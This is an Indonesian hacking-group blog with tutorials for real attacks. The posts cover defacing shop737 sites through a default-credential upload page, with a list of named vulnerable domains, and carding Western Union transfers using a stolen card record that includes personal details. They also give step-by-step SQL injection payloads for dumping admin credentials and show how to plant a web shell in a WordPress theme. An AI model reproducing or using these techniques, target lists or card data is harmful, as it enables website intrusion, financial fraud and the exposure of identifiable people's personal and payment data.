Sabtu, 17 Agustus 2013

Tutorial Deface Dengan Upload File Shop737

Admin Mau Bagi-Bagi Tutorial Deface Lagi Nih :) , Langsung Aja Cekibrot

1. Tulis dork in google : intext:”Powered by shop737” => kembangin lagi dorknya, semakin kreatif kamu, semakin banyak target yang didapat
2. Pilih 1 website, masukkan exploit ini " poto/upload.php " setelah URL target
3. Maka akan muncul laman website yang meminta username dan password,isi dengan
username : admin
password : admin
*Kalo Username dan password Invalid,Maka Cari target Lain :p ( Klik Gambar Untuk Memperbesar)
4. Kalau udah login,pilih kategori file yang ingin diupload (1)  
5. Upload file kamu (jpg/txt) karena Cuma 2 ekstensi itu yang bisa diupload, kecuali kamu pakai add-ons tamper data untuk mengupload shell kamu ( Klik Gambar Untuk Memperbesar )
6.Akses file kamu di http://localhost/poto/[nama kategori]/[nama file]


Maka Hasilnya :
http://jualanparfummurah.com/poto/newbienymouz/x.txt
http://www.outletgrosironline.com/poto/newbienymouz/x.txt
http://rumahsusu-karawang.com/poto/newbienymouz/x.txt
http://rumahcetakraswari.com/poto/newbienymouz/x.txt

Content Creator : El-Yofro

keyword : shop737 , deface dengan sho737 , deface dengan cara Shop737

List Target Shop737 Terbaru

intext:”Powered by shop737”

  

Admin Mau Bagi Nih List Target Deface Dengan Shop737 Yang Masih FRESH !
Monggo Bisa Dicoba Satu Satu ^_^
Admin Nitip Nick Aja , "El-Yofro"
Untuk Tutorial Cara NEBAS/DEFACEnya , Monggo KE SINI

#####LEAKED BY El-YOFRO#######
http://sundy-reload.net/poto/index/upload.php
http://mbsfx.info/poto/upload.php
http://www.komodo-florestours.com/poto/upload.php
http://www.grahayatim.org/poto/upload.php
http://www.apartementdibandung.com/poto/upload.php
http://murniwisata.com/poto/upload.php
http://www.cleohair602.com/poto/upload.php
http://www.stt-katharos.com/poto/upload.php
http://www.outletgrosironline.com/poto/upload.php
http://www.pondokkhitan.com/poto/upload.php
http://jualanparfummurah.com/poto/upload.php
http://www.outletgrosironline.com/poto/upload.php
http://rumahsusu-karawang.com/poto/upload.php
http://rumahcetakraswari.com/poto/upload.php
#####LEAKED BY El-YOFRO#######

Content Creator : El-Yofro

keyword : intext:”Powered by shop737” ,shop737,deface dengan shop737,target shop747,deface shop737,teknik deface shop737

Carding Dengan Western Union



Selamat Malam Para Haiker Sekalian xD
Berjumpa Lagi Dengan Mimin Ganteng Disini :v
Udah Lama Ye Mimin Kagak Ngeblog ?..... :v

Kali Ini Kita Akan Belajar Tentang Carding *weseh
Jangan Bingung Dulu,Saya Tidak Pernah Menuntut Hal Carding Untuk Kejahatan,Hanya Untuk Pembelajaran xD
Carding Bahasa Gampangane,Nyolong Duit Online... Ngono Kui Lah
"Carding Dosa Dong?" Nggak Dosa Juga Kalo Hasil Cardingnya Disumbangin Ke Orang Yang Tidak Mampu Seperti Mimin :3

Langsung Saja Menuju Tutorial..
====================================================================

Tools :

1.Internet Dengan Proxy,Atau Lebih Bagus Lagi VPN
2.CC(Credit Card) UK Bin
3.Diutamakan Full Info CC,Atau Yang Non AVS dan Non VBV(Verified by Visa)

*Contoh CC Full Info :

4658598767100863
CVV: 773
Full name: Trevor J Thomas
Expires: 04/14
DOB: 25/feb/1955
Country: United Kingd0m
State: CHESAPEAKE
City: CHESAPEAKE Address: 6 Norwich Road, DONCASTER,
Post Code / ZIP: DN2 4QD
Phone: 01785777055SSN:MMN: michael

-------------------------------------------------------------------------------------------------------------

[-]Step One

Set IP Ke UK Dulu Pastinya
Kalo Udah,Pergi ke http://www.westernunion.co.uk/gb/Home.page?
Daftar Sesuai Data CC,Jangan Lupa Imel Valid
Pilih Send to Country (Indonesia)
Money In Minutesmax Pengiriman 50 gpb + Biaya 4.90 gpb = 54.90 gpb (Rp 735.908xx)
Tulis Nama Penerima Sesuai KTP(Ra Ndue,Njaluk Bapakmu)

[-]Step Two

1. Isi Data Pengirim Confirm CVV,Review Confirm Payment and Receiver Details No Telp (Diusahakan sama Karena Biasanya BOT WU Mengecek dengan List DiBank )

2. Isi VBV or Master Code Kalo Diminta ( Tapi Ada Bin Tertentu Yang Tanpa VBV )

3. Receipt (Succes!)

Kalo Sukses Terkirim,Akan Tampil Seperti ini Di Home WU :

Thank You for choosing Western Union.Your money transfer has been sent and can be picked up at any Agent location in your receiver's area. You will receive an email confirming this transaction.

"Identity Verification Status: Not VerifiedRemaining Online Transactions Allowed: 1 (normal 2)Identity Verification Process: Not Started"

Dan Nanti Akan Disertai MTCN Seperti ini (MTCN 8422679629 )

4.Selanjutnya Bawa Ambil WU dengan MTCN itu Disertai Identitas KTP (Ra Ndue Nyilih Bapakmu Kandani)


Sekian Saja Tutorial Dari Mimin,Kalo Ada Yang Bertanya "Cara Mendapatkan CC Bagaimana?" Ya Cari Ndiri Lah :v Nanti Kapan-Kapan Mimin Ganteng Juga Akan Ngepost Tutorialnya :v
Ingat,Jangan Disalah Gunakan...Saya Tidak Pernah Menganjurkan Untuk Melakukan Tutorial di Blog Saya ini

Content  Creator : El-Yofro

keyword : carding,western union,tutorial carding,carding dengan western union,cara carding,tutorial carding sederhana

Tutorial SQL Manual Sederhana

Selamat Malam Pemirsa xD
Berjumpa Lagi Dengan Admin Ganteng Disini 8)
Admin Mau Bagi Tutor Nih *weseh
SQL Manual,Yap Cara Yang Sudah Sangat Tua Namun Masih Vuln :v
Daripada Kebanyakan Bacot Mending Langsung Ke Tutorial :v

1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

Content Creator : El-Yofro

keyword : sql manual,deface dengan sql manual,tutorial sql manual,hack sql manual,sql injection,tutorial sql injection

Tutorial Tanam Shell via Config

 TUTORIAL INI DIAMBIL DARI YogaWebster ^_^

Selamat Malam Silent Reader,
Kali Ini Admin Akan Membahas Tentang Cara Menanam Shell lewat Config



Banyak Sekali "Defacer" Yang Sudah Bisa Menanam Config,Namun Bingung Bagaimana Cara Menggunakanya,Oleh Karena Itu Admin Akan Membahas Cara Menanam Shellnya ( For Wordpress )
Untuk Cara Menanam Config,Mungkin Akan Admin Post Dilain Waktu :)

Peralatan Tempur :
1.Shell Yang Sudah Tertanam dengan Config
2.MySQL Interface PHP
3.Kopi+Susu :)

1.Pilih Salah Satu Config,Pilih Yang Bertuliskan Wordpress ( Optional )
2.Maka Akan Nampak Beberapa Script,Seperti Gambar Dibawah :
3.Upload MySQL Interface PHP Anda,Dan Pergi Kelink Yang Sudah Diupload
4.Buka MySQL Interface PHP Yang Sudah Diupload Tadi,Dan Akan Nampak Gambar Dibawah :
5.Isi Nomor 1 Dengan DB User dan Isi Nomor 2 Dengan DB Password Tanpa Tanda Petik ( ' )
6.Maka Anda Akan Masuk Ke Halaman Database,Pilih Database Yang Sama Dengan Nama User DB ( Tidak Mesti Sama Juga )
7.Klik Menu Tables Sesuai Pilihan Tadi
7.Maka Anda Akan Masuk Kehalam Tables Database Dari Server Target8.Lihat Pada Tables Yang Bernama : wp_options dan wp_user (Bisa Juga : NamaTarget_Options)
9.Klik Menu 'DATA' Pada Tables "Target_options" dan "Target_user"
10.*PADA TABLES USER*,Edit Formnya Sesuai Keininganmu,Password Hanya Bisa Menerima Berjenis MD5 ( Hash Disini http://exploitday.com/md5.php )
11.Jika Sudah Selesai,Klik Edit Data
12.*PADA TABLES OPTIONS*,Maka Akan Terlihat Link Target,Copy Dan Paste Di Addres Bar.Tambahkan /wp-admin di Belakang URL Target. ( Contoh http://targetku.com/wp-admin )
13.Setelah Menambahkan /wp-admin atau /wp-login.php di Belakang URL Target,Enter dan Maka Anda Akan Dibawa Ke Halaman Form Login Admin Wordpress
14.Isi Sesuai Username dan Password yang Anda Buat Tadi
15.Login dan Jika Login Sukses Maka Anda Akan Dibawa Ke Halaman Dasbor Admin
**Jika Site Dalam Bahasa Selain Inggris,Saya Sarankan Anda Agar Memakai Browser Google Chorme Yang Bisa Otomatis Mentraslate Website
16.Klik Menu Themes->Editor
17.Setelah Itu,Anda Akan Dibawa Ke Halaman Editor Themes,Pilih File 404.php ( Selain Ini Juga Bisa atau Jika Tidak ada 404.php Bisa Memakai File Lain )
18.Ganti Script Yang Ada dengan Script Shell Mu,Setelah Itu Klik Update
19.Jika Update Sukses,Maka Anda Tinggal Menuju Ke Halaman 404.php,Dimana Lokasinya di http://TARGETKAMU.com/404.php
20.Jika Sukses,Maka Anda Akan Dibawa Ke Halaman Shell Anda ^_^
21.Setelah Itu,Terserah Deh Site Mau Diapain xD

Sekian Tutorial Dari Saya,Jika Ada Salah Kata Mohon Dimaafkan
Regards,
El-Yofro

Source : YogaWebster

keyword : deface dengan config,tutorial config,cara menanam config,cara menanam shell,cara deface dengan config,apa itu config

About Us

Welcome to Cyber World

About Us - Agency Of NewbienymouZ Corporation

NewbienymouZ,Berdiri Pada Tanggal 10 Februari 2013 ( Kalo Gak Salah :v ). Didirikan Oleh El-Yofro aka Frooza aka Yoga Harvananda ( Orang Paling Ganteng Tauk ). El-Yofro Sendiri Bukan Merupakan Seorang Heker,Apalagi Cracker :v Melainkan Hanya Seorang Gantengers 8). NewbienymouZ Berdiri Saat #OP Myanmar Sedang Berlangsung Dan Berkoar.
Sebelumnya,NewbienymouZ Bernama "Black Newbie Team" Tetapi,Dikarenakan Nama Yang Kurang Cocok Dan Sudah Ada Yang Menggunakanya,Maka Semua Member Sepakat Untuk Mengganti Nama Dengan Nama ''NewbienymouZ". Nama NewbienymouZ Sendiri Didapatkan Oleh Saya (El-Yofro) Setelah Mendapat Wangsit Bertapa DiGunung Merapi 7 Hari 7 Malam 8).
Tidak Ada Yang Special di NewbienymouZ,Mulai Dari Anggota Hingga Anggota,Semua Hanya Anggota/Member Biasa.Tidak Ada Master/Suhu/Dewa/Heker Disini.Melainkan Semua Sama.Seperti Motto NewbienymouZ : "Duduk Sama Rendah,Berdiri Sama Tinggi".Di NewbienymouZ Pun Tidak Semuanya "Paham" Tentang Dunia Underground,Banyak Sekali Yang Masih Belum Paham Tentang Dunia Underground Dan Masuk Ke NewbienymouZ,Karena NewbienymouZ Adalah Tempat Belajar,Bukan Tempat Pamer
 NewbienymouZ Tidak Pernah Memberikan Biaya Bagi Member/Anggota Yang Ingin Bergabung,Hanya.Kami Menyeleksi Beberapa Orang Yang Sudah Niat.Kami Tidak Ingin Mencari Seorang Anggota Yang Sudah "Dewa,Pro,Heker,Angonwedos" Tapi Nyatanya? Dia Lupa Pada Asal Usulnya.Bagaikan Pepatah Yang Dituturkan Oleh Paduka Sultan HB X "Sak Duwur-Duwure Sinau Kudune Dewe Tetep Wong Jowo"
 Saat Ini Member Di NewbienymouZ Beranggotakan 34 Orang Gantengers 8) - Data Dihitung Per 17 Agustus 2013

Peraturan Yang Berlaku Di NewbienymouZ Antara Lain :
  • Dilarang Mendelete Shell Yang Sudah Dibagikan,Apalagi Mengganti Password
  • TIDAK SOMBONG COK ! (Dilarang Ngaku2 Heker,Ngaku2 Haxor,Apalagi Sampai Membawa Nama NewbienymouZ Ke Organisasi Angonwedos aka Onanimus aka Anonymous! )
  • Menjaga Kerahasiaan Semua Yang Ada Digroup
  • Loyal Terhadap Group
  • *WAJIB MENCANTUMKAN POC ( PIE TO CARANE ) DISETIAP SHOWOFF HASIL DEFACE AGAR YANG NEWBIE BISA BELAJAR
 Terakhir,Pesan Kami Untuk Pembaca Adalah :
-Skill seorang hacker bukan dinilai dari besarnya perkataan, melainkan dinilai dari suatu hasil yang besar yang telah dibuatnya.

Regards,
El-Yofro Lead of NewbienymouZ Corporation
www.newbienymouz.com